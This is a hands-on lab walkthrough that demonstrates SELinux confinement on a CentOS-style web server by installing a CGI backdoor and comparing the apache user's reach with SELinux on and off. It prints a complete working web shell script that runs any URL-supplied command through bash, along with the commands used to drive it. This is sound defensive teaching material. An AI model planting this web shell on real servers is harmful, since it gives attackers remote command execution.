#########################################################
# Seeing the effect of SELinux after an http compromise #
#########################################################
####
#### Objective: Use a cgi backdoor to access a system with and without SELinux enabled
####
#### Basic steps:
#### - Install httpd
#### - Start and enable service
#### - Add port to firewall
#### - Install cgi backdoor
#### - Connect to backdoor and try some things
#### - Try same things in apache user full shell
#### - Disable SELinux, reboot
#### - Connect to backdoor again and try same things
#### - Optionally, clone VM and compare side-by-side
#### 
#### Full solution:

#### Install packages for apache (httpd)
[root@localhost ~]# yum group install "basic web server"

#### start/enable httpd service, and  make hole in firewall for tcp/8001
[root@localhost ~]# systemctl enable httpd
ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/multi-user.target.wants/httpd.service'
[root@localhost ~]# systemctl start httpd
[root@localhost ~]# firewall-cmd --list-all
public (default, active)
  interfaces: enp0s3
  sources:
  services: dhcpv6-client ssh
  ports:
  masquerade: no
  forward-ports:
  icmp-blocks:
  rich rules:

[root@localhost ~]# firewall-cmd --permanent --add-port=8001/tcp
success
[root@localhost ~]# firewall-cmd --reload
success
[root@localhost ~]# firewall-cmd --list-all
public (default, active)
  interfaces: enp0s3
  sources:
  services: dhcpv6-client ssh
  ports: 8001/tcp
  masquerade: no
  forward-ports:
  icmp-blocks:
  rich rules:

#### httpd is now listening on 80 and 443
[root@localhost ~]# ss -lntp | grep httpd
LISTEN     0      128                      :::80                      :::*      users:(("httpd",9724,4),("httpd",9723,4),("httpd",9722,4),("httpd",9721,4),("httpd",9720,4),("httpd",9719,4),("httpd",9718,4))
LISTEN     0      128                      :::443                     :::*      users:(("httpd",9724,6),("httpd",9723,6),("httpd",9722,6),("httpd",9721,6),("httpd",9720,6),("httpd",9719,6),("httpd",9718,6))

#### Put the cgi backdoor into place
#### You can scp it, or paste into an ssh window
#### Here is what should go in the file (between the marker lines)
--- BEGIN ---
#!/bin/sh

echo "Content-type: text/html"
echo ""

CMD=$(python2 -c 'import sys, urllib; print urllib.unquote(sys.argv[1])' "${QUERY_STRING}" | sed s:"^cmd=":"":)
bash -c "${CMD}" 2>&1
--- END ---

# Make the backdoor executable
chmod +x /var/www/cgi-bin/index.cgi

# Make sure that the SELinux label of the new file is correct
[root@localhost ~]# ls -laZ /var/www/cgi-bin/index.cgi 
-rw-r--r--. root root unconfined_u:object_r:httpd_sys_script_exec_t:s0 /var/www/cgi-bin/index.cgi

# Depending on how you put the file in place it may or may not be correct, to fix
restorecon -vvFR /var/www

#### To use the cgi backdoor access through the webserver /cgi-bin/index.cgi?cmd=(CMD)
#### THere are several ways to do this
#### Put this in the browser on your host system
http://localhost:20080/cgi-bin/index.cgi?cmd=ifconfig

#### Use curl
curl http://localhost:20080/cgi-bin/index.cgi -G --data-urlencode "cmd=ifconfig"

#### If you are in an environment that can execute shell scripts (unix system, cygwin, etc)
#### Then you can use the cgiclient.sh script
#### It will provide you wth an interactive shell through the backdoor
treehouse:SELinux ben$ ./cgiclient.sh 
Usage: ./cgiclient.sh ip|hostname [cmd list]
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ifconfig
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        ether 08:00:27:69:9d:70  txqueuelen 1000  (Ethernet)

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 0  (Local Loopback)

[ localhost:20080 ]$ exit

#### Try some commands to test your privileges on the system
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ls -la /
total 36
dr-xr-xr-x.  17 root root 4096 Oct  3 17:31 .
dr-xr-xr-x.  17 root root 4096 Oct  3 17:31 ..
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x.  19 root root 2960 Oct  4 13:55 dev
drwxr-xr-x.  85 root root 8192 Oct  4 14:11 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x. 107 root root    0 Oct  4 13:55 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x.  26 root root  720 Oct  4 14:11 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x.  13 root root    0 Oct  4 13:55 sys
drwxrwxrwt.   2 root root    6 Oct  4 14:01 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 13:56 var
[ localhost:20080 ]$ getenforce
getenforce:  getenforce() failed[ localhost:20080 ]$ 
[ localhost:20080 ]$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t:s0
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt.  2 root root    6 Oct  4 14:01 .
dr-xr-xr-x. 17 root root 4096 Oct  3 17:31 ..
[ localhost:20080 ]$ touch /tmp/t
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt.  2 root   root     14 Oct  4 14:45 .
dr-xr-xr-x. 17 root   root   4096 Oct  3 17:31 ..
-rw-r--r--.  1 apache apache    0 Oct  4 14:45 t
[ localhost:20080 ]$ echo banana | su - -c "id"
Password: su: System error
[ localhost:20080 ]$ echo "#!/bin/sh" >> /tmp/t
[ localhost:20080 ]$ echo "id" >> /tmp/t
[ localhost:20080 ]$ chmod +x /tmp/t
[ localhost:20080 ]$ /tmp/t
bash: /tmp/t: Permission denied
[ localhost:20080 ]$ ls -la /tmp
total 8
drwxrwxrwt.  2 root   root     14 Oct  4 14:45 .
dr-xr-xr-x. 17 root   root   4096 Oct  3 17:31 ..
-rwxr-xr-x.  1 apache apache   13 Oct  4 14:51 t

#### Compare these to what you can do with SELinux enabled in a full apache user shell
[root@localhost ~]# su - apache -s /bin/bash
-bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -la /
total 40
dr-xr-xr-x.  17 root root 4096 Oct  4 15:02 .
dr-xr-xr-x.  17 root root 4096 Oct  4 15:02 ..
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x.  19 root root 2960 Oct  4 15:03 dev
drwxr-xr-x.  85 root root 8192 Oct  4 15:03 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x. 115 root root    0 Oct  4 15:03 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x.  26 root root  760 Oct  4 15:03 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x.  13 root root    0 Oct  4 15:03 sys
drwxrwxrwt.   8 root root 4096 Oct  4 15:03 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 15:03 var
-bash-4.2$ getenforce
Enforcing
-bash-4.2$ ls -la /tmp
total 184
drwxrwxrwt.  8 root root  4096 Oct  4 15:03 .
dr-xr-xr-x. 17 root root  4096 Oct  4 15:02 ..
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .font-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .ICE-unix
-rwx------.  1 root root   813 Oct  3 17:32 ks-script-XS5xaX
drwx------.  3 root root    16 Oct  4 15:03 systemd-private-7HgbpM
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .Test-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .X11-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .XIM-unix
-rw-------.  1 root root     0 Oct  3 17:29 yum.log
-rw-------.  1 root root 78432 Oct  3 17:49 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------.  1 root root  1857 Oct  3 17:50 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------.  1 root root  7230 Oct  3 17:51 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------.  1 root root 78432 Oct  4 13:53 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx
-bash-4.2$ touch /tmp/t
-bash-4.2$ ls -la /tmp
total 184
drwxrwxrwt.  8 root   root    4096 Oct  4 15:04 .
dr-xr-xr-x. 17 root   root    4096 Oct  4 15:02 ..
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .font-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .ICE-unix
-rwx------.  1 root   root     813 Oct  3 17:32 ks-script-XS5xaX
drwx------.  3 root   root      16 Oct  4 15:03 systemd-private-7HgbpM
-rw-r--r--.  1 apache apache     0 Oct  4 15:04 t
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .Test-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .X11-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .XIM-unix
-rw-------.  1 root   root       0 Oct  3 17:29 yum.log
-rw-------.  1 root   root   78432 Oct  3 17:49 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------.  1 root   root    1857 Oct  3 17:50 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------.  1 root   root    7230 Oct  3 17:51 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------.  1 root   root   78432 Oct  4 13:53 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx
-bash-4.2$ echo banana | su - -c "id"
Password: uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -la /home
total 8
drwxr-xr-x.  3 root root   17 Oct  3 17:31 .
dr-xr-xr-x. 17 root root 4096 Oct  4 15:02 ..
drwx------.  4 user user 4096 Oct  4 14:05 user
-bash-4.2$ echo "#!/bin/sh" >> /tmp/t
-bash: !/bin/sh": event not found
-bash-4.2$ vi /tmp/t
-bash-4.2$ chmod +x /tmp/t
-bash-4.2$ /tmp/t
uid=48(apache) gid=48(apache) groups=48(apache) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -laZ /tmp
drwxrwxrwt. root   root   system_u:object_r:tmp_t:s0       .
dr-xr-xr-x. root   root   system_u:object_r:root_t:s0      ..
drwxrwxrwt. root   root   system_u:object_r:user_fonts_t:s0 .font-unix
drwxrwxrwt. root   root   system_u:object_r:user_tmp_t:s0  .ICE-unix
-rwx------. root   root   system_u:object_r:initrc_tmp_t:s0 ks-script-XS5xaX
drwx------. root   root   system_u:object_r:tmp_t:s0       systemd-private-7HgbpM
-rwxr-xr-x. apache apache unconfined_u:object_r:user_tmp_t:s0 t
drwxrwxrwt. root   root   system_u:object_r:rpm_script_tmp_t:s0 .Test-unix
drwxrwxrwt. root   root   system_u:object_r:user_tmp_t:s0  .X11-unix
drwxrwxrwt. root   root   system_u:object_r:rpm_script_tmp_t:s0 .XIM-unix
-rw-------. root   root   system_u:object_r:initrc_tmp_t:s0 yum.log
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx


#### Disable SELinux and reboot
vi /etc/selinux/conf
systemctl reboot

#### Connect to the backdoor again and try the same commands
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ls -la /
total 36
dr-xr-xr-x.  17 root root 4096 Oct  4 14:52 .
dr-xr-xr-x.  17 root root 4096 Oct  4 14:52 ..
-rw-r--r--    1 root root    0 Oct  4 14:52 .autorelabel
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x   19 root root 2960 Oct  4 14:52 dev
drwxr-xr-x.  85 root root 8192 Oct  4 14:52 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x  111 root root    0 Oct  4 14:52 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x   26 root root  760 Oct  4 14:52 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x   13 root root    0 Oct  4 14:52 sys
drwxrwxrwt    2 root root    6 Oct  4 14:52 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 14:52 var
[ localhost:20080 ]$ getenforce
Disabled
[ localhost:20080 ]$ id
uid=48(apache) gid=48(apache) groups=48(apache)
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt   2 root root    6 Oct  4 14:52 .
dr-xr-xr-x. 17 root root 4096 Oct  4 14:52 ..
[ localhost:20080 ]$ touch /tmp/t
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt   2 root   root     14 Oct  4 14:57 .
dr-xr-xr-x. 17 root   root   4096 Oct  4 14:52 ..
-rw-r--r--   1 apache apache    0 Oct  4 14:57 t
[ localhost:20080 ]$ echo banana | su - -c "id"
Password: uid=0(root) gid=0(root) groups=0(root)
[ localhost:20080 ]$ ls -la /home
total 8
drwxr-xr-x.  3 root root   17 Oct  3 17:31 .
dr-xr-xr-x. 17 root root 4096 Oct  4 14:52 ..
drwx------.  4 user user 4096 Oct  4 14:05 user
[ localhost:20080 ]$ echo "#!/bin/sh" >> /tmp/t
[ localhost:20080 ]$ echo "id" >> /tmp/t
[ localhost:20080 ]$ chmod +x /tmp/t
[ localhost:20080 ]$ /tmp/t
uid=48(apache) gid=48(apache) groups=48(apache)
[ localhost:20080 ]$ ls -la /tmp
total 8
drwxrwxrwt   2 root   root     14 Oct  4 14:57 .
dr-xr-xr-x. 17 root   root   4096 Oct  4 14:52 ..
-rwxr-xr-x   1 apache apache   13 Oct  4 14:58 t
[ localhost:20080 ]$ ls -laZ /tmp
drwxrwxrwt  root   root   ?                                .
dr-xr-xr-x. root   root   system_u:object_r:root_t:s0      ..
-rwxr-xr-x  apache apache ?                                t
[ localhost:20080 ]$ exit










